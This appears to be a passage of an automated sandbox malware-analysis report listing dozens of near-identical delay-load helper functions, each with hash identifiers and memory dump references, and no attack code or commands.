                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: dff409ac86be3c5c3ce1abd02e1cc9b2f3d324c2cba0edebc73a49743459f077
                          • Instruction ID: 4c42fe733f1b384ff490688e294e82296c427b036f2f5917d33d42b8e504afe1
                          • Opcode Fuzzy Hash: dff409ac86be3c5c3ce1abd02e1cc9b2f3d324c2cba0edebc73a49743459f077
                          • Instruction Fuzzy Hash: 58B012A626C201AC320F72167C02D3B035CC0C0B10330C15BF409C41C5D4484C055631
                          Function 0038DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: b9695d89143174cefddcd6fe78bf5f8dec5f4c5236b79be37002f578621b11bb
                          • Instruction ID: 8cc275578a89d1aeeb4eaf85f00cf88af700f3f6bc4122905d805b118b5b84de
                          • Opcode Fuzzy Hash: b9695d89143174cefddcd6fe78bf5f8dec5f4c5236b79be37002f578621b11bb
                          • Instruction Fuzzy Hash: 7DB012962AC3016D710F72067C02E3B035CD0C1B11330815BF009C41C5D4444C045731
                          Function 0038DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 9ae05b247df4a335c868fdacefa2c20d15d2e5ea019b8cad6f732cdf4ca6d259
                          • Instruction ID: 2bf85facb80944928ee89240f8c5642397485ff041a1a1215a32f162ca555462
                          • Opcode Fuzzy Hash: 9ae05b247df4a335c868fdacefa2c20d15d2e5ea019b8cad6f732cdf4ca6d259
                          • Instruction Fuzzy Hash: 41B0129A36C2426C310F71043D07D77436CC0D4B10330805BF60AC41C1D9414C055231
                          Function 0038DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: c7e2b412594a9b323c36ec01b6560e6b508166228b2b829c82f6b92b5e5786f1
                          • Instruction ID: 779226c08ca3e8f355750521a75524bcb7723f8ccb4be0369e9c9c279b980a95
                          • Opcode Fuzzy Hash: c7e2b412594a9b323c36ec01b6560e6b508166228b2b829c82f6b92b5e5786f1
                          • Instruction Fuzzy Hash: 52B0129A36C202AC320F71043C07D77437CC0D0B10330805BF90AC51C1D9404C085231
                          Function 0038DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: ce92df13b331a1e58e8bbb6abb0cf4cb4d953323a4bc05ceee07d6a7dac67e57
                          • Instruction ID: 533668aeb6f99ff9156566109a763ba46b905394832067d21335b605b0c8eeed
                          • Opcode Fuzzy Hash: ce92df13b331a1e58e8bbb6abb0cf4cb4d953323a4bc05ceee07d6a7dac67e57
                          • Instruction Fuzzy Hash: EFB012DE36C2016C310B71153C07E77036CD0D0B10330806BF10BC45C1D9404C085231
                          Function 0038DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 1f5f102b4a90a17be12f6fa478cf8eb5e858d2e13948eca25ae461ea9aa1ac33
                          • Instruction ID: 31edf80ed88edb08a10ee141917cf05dc574c0c87ae3b5e367cfe3c0760f8c28
                          • Opcode Fuzzy Hash: 1f5f102b4a90a17be12f6fa478cf8eb5e858d2e13948eca25ae461ea9aa1ac33
                          • Instruction Fuzzy Hash: 9FB0129A37C3067C320B31003C07C77432CC0D0B10330416BF506D40C199404C485131
                          Function 0038DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DC36
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: c2a068f9accad5500e15b243ff23f0e4e0d23822d8da4b6b58b192c275ac678d
                          • Instruction ID: 9435d225a679e2214d665afd0473cbc2077b2cb4271a37c11fc7c2de081e3366
                          • Opcode Fuzzy Hash: c2a068f9accad5500e15b243ff23f0e4e0d23822d8da4b6b58b192c275ac678d
                          • Instruction Fuzzy Hash: 10B0129A26C301BC310F31107E12C77433CC1C0B11330865BF209E40D1A5805C446131
                          Function 0038DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DC36
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 827c5468deab0e4f42a5fa5a1ade5a3d0a93a8b201d010b34c5a96af6f769116
                          • Instruction ID: 18daef08804f0b1ac9bd36ad94129fcad214aea2a618fead47436cde9ab989af
                          • Opcode Fuzzy Hash: 827c5468deab0e4f42a5fa5a1ade5a3d0a93a8b201d010b34c5a96af6f769116
                          • Instruction Fuzzy Hash: 32B0129A27C302AC310F71147C12D77037CC0C0B10330855BF20DD51D1E5805C045231
                          Function 0038DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DC36
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 5b06939cfd582fb0cff1306025779d1244e89eb4778a22da057c9b76627bc62a
                          • Instruction ID: 5b895b657de941b7bff5ed33a220c0761aea91776d3475932842d83701415388
                          • Opcode Fuzzy Hash: 5b06939cfd582fb0cff1306025779d1244e89eb4778a22da057c9b76627bc62a
                          • Instruction Fuzzy Hash: 2CB0129A26C301BC310F71147C12D77037CC0C5B10330C55BF60DD51D1E5805C045231
                          Function 0038D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: ea43a05bc74f20928618751a796576bad203176ba77bdb538cbc14976b2b1953
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: ea43a05bc74f20928618751a796576bad203176ba77bdb538cbc14976b2b1953
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: e81658f558560a55bacbaa7f6261bc959e0fc0673d4f1b9e19f484279239a14a
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: e81658f558560a55bacbaa7f6261bc959e0fc0673d4f1b9e19f484279239a14a
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 26bd720a4aaa7ca8a1dff42ad126e91381f44b3acab41a0af379a0d5f4fbe436
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: 26bd720a4aaa7ca8a1dff42ad126e91381f44b3acab41a0af379a0d5f4fbe436
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: ba8d0b82502132d8746668ed72511c389a057d9bc1337b9861a9e60124dc4d00
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: ba8d0b82502132d8746668ed72511c389a057d9bc1337b9861a9e60124dc4d00
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 1a2e9134f8b803239c5dd19ac9eda6e606ca2086b756449225987218290261d4
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: 1a2e9134f8b803239c5dd19ac9eda6e606ca2086b756449225987218290261d4
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: d4308a80fe60093b73f54845f9a7ca5fc2684ff7b3a398ae3d2a0b84c999054a
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: d4308a80fe60093b73f54845f9a7ca5fc2684ff7b3a398ae3d2a0b84c999054a
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 5a59ea2cff52197731045aa1e460f6489da1a39991d313b28ce02c0f6695a5d8
                          • Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
                          • Opcode Fuzzy Hash: 5a59ea2cff52197731045aa1e460f6489da1a39991d313b28ce02c0f6695a5d8
                          • Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30
                          Function 0038D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
